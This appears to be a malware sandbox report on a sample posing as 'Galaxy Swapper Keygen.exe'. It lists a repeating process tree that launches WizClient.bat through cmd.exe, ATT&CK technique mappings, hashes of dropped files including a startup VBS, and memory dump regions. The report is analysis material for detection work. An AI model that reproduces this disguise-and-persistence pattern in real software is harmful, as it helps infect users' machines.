C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
200⤵
PID:10348

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
201⤵
PID:8148

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
201⤵
PID:4100

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
202⤵
PID:10584

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
202⤵
PID:10728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
203⤵
PID:5240

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
203⤵
PID:1564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
204⤵
PID:10516

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
204⤵
PID:10360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
205⤵
PID:8328

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
205⤵
PID:10788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
206⤵
PID:4156

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
206⤵
PID:10748

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
207⤵
PID:10788

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
207⤵
PID:9156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
208⤵
PID:6448

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
208⤵
PID:11204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
209⤵
PID:11356

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
209⤵
PID:11380

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
210⤵
PID:11560

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
210⤵
PID:11588

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
211⤵
PID:11752

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
211⤵
PID:11832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
212⤵
PID:12012

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
212⤵
PID:12060

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
213⤵
PID:12220

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
213⤵
PID:12244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
214⤵
PID:11476

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
214⤵
PID:8608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
215⤵
PID:6212

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
215⤵
PID:11500

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
216⤵
PID:11576

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
216⤵
PID:10720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
217⤵
PID:11660

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
217⤵
PID:11772

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
218⤵
PID:7268

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
218⤵
PID:11912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
219⤵
PID:12068

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
219⤵
PID:6996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
220⤵
PID:11580

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
220⤵
PID:11220

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
221⤵
PID:10428

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
221⤵
PID:7864

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
222⤵
PID:11380

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
222⤵
PID:11940

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
223⤵
PID:11856

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
223⤵
PID:9304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
224⤵
PID:11068

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
224⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
225⤵
PID:9484

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
225⤵
PID:9628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
226⤵
PID:4756

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
226⤵
PID:10644

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
227⤵
PID:6884

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
227⤵
PID:6984

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
228⤵
PID:6788

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
228⤵
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
229⤵
PID:7496

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
229⤵
PID:7148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
230⤵
PID:9368

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
230⤵
PID:11796

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
231⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
231⤵
PID:4744

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
232⤵
PID:5472

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
232⤵
PID:5564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
233⤵
PID:6852

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
233⤵
PID:7532

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
234⤵
PID:12512

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
234⤵
PID:12680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\WizClient.bat

Filesize
395KB

MD5
f648a3808707ec58ae00f082ac787b6b

SHA1
55ae98650074783346b5de7e9d069b191277a297

SHA256
a567eb6b80ef0dbeda64cfdc1ed0879f4367cfaca137b5cd66b173716282f2b1

SHA512
9fe7e9203532df159a23c06d71a9e95ec7a06102e266f355fed35fd8eea4caefd8ccd8d021495269df2801b020e1399bb8bf818d98f327d4527bc3d28c609e5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_11s2sm1t.cso.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_601.vbs

Filesize
124B

MD5
5d6be9e63fb0613fc246abed894f729b

SHA1
944a90cf9bad336c3dda900abfa8fee227f8d032

SHA256
7a4f95901b309ea7cb74013cae942329ecbaac5fc871f6e7d4854888067881b4

SHA512
5a34e857d32324eb158180a7c819c7427218c8a6afcf7974fb25344d1ba560c05f3812b909d023fbd6878e941d407b00df229fd1ba42626308ee4ce3812c993c

Download Submit
memory/1660-225-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/1660-234-0x0000000006F00000-0x0000000006FA4000-memory.dmp

Filesize
656KB

Download
memory/1660-239-0x0000000007270000-0x0000000007281000-memory.dmp

Filesize
68KB

Download
memory/3788-139-0x0000000006550000-0x0000000006584000-memory.dmp

Filesize
208KB

Download
memory/3788-155-0x00000000074F0000-0x0000000007501000-memory.dmp

Filesize
68KB

Download
memory/3788-154-0x0000000007560000-0x00000000075F6000-memory.dmp

Filesize
600KB

Download
memory/3788-153-0x0000000007350000-0x000000000735A000-memory.dmp

Filesize
40KB

Download
memory/3788-140-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/3788-150-0x0000000007190000-0x0000000007234000-memory.dmp

Filesize
656KB

Download
memory/3788-149-0x0000000007160000-0x000000000717E000-memory.dmp

Filesize
120KB

Download
memory/4328-116-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

Filesize
104KB

Download
memory/4328-82-0x0000000006400000-0x0000000006466000-memory.dmp

Filesize
408KB

Download
memory/4328-118-0x0000000007D50000-0x0000000007D9C000-memory.dmp

Filesize
304KB

Download
memory/4328-117-0x0000000007D30000-0x0000000007D38000-memory.dmp

Filesize
32KB

Download
memory/4328-115-0x0000000008360000-0x00000000089DA000-memory.dmp

Filesize
6.5MB

Download
memory/4328-100-0x0000000007B00000-0x0000000007B46000-memory.dmp

Filesize
280KB

Download
memory/4328-95-0x0000000006A30000-0x0000000006A7C000-memory.dmp

Filesize
304KB

Download
memory/4328-94-0x0000000006940000-0x000000000695E000-memory.dmp

Filesize
120KB

Download
memory/4328-91-0x0000000006470000-0x00000000067C7000-memory.dmp

Filesize
3.3MB

Download
memory/4328-119-0x00000000089E0000-0x0000000008F86000-memory.dmp

Filesize
5.6MB

Download
memory/4328-81-0x00000000062A0000-0x0000000006306000-memory.dmp

Filesize
408KB

Download
memory/4328-80-0x0000000005A80000-0x0000000005AA2000-memory.dmp

Filesize
136KB

Download
memory/4328-79-0x0000000005C00000-0x000000000622A000-memory.dmp

Filesize
6.2MB

Download
memory/4328-76-0x0000000005570000-0x00000000055A6000-memory.dmp

Filesize
216KB

Download
memory/5424-859-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/5484-687-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/7440-361-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/7608-430-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/8572-472-0x0000000007420000-0x00000000074C4000-memory.dmp

Filesize
656KB

Download
memory/8572-462-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/9828-645-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/9856-584-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/10156-602-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/10204-723-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/10572-1187-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/10572-1216-0x0000000007DB0000-0x0000000007DC1000-memory.dmp

Filesize
68KB

Download
memory/10916-944-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/11072-969-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/11164-1004-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/11916-1025-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/11916-1207-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download
memory/12072-1225-0x00000000738D0000-0x000000007391C000-memory.dmp

Filesize
304KB

Download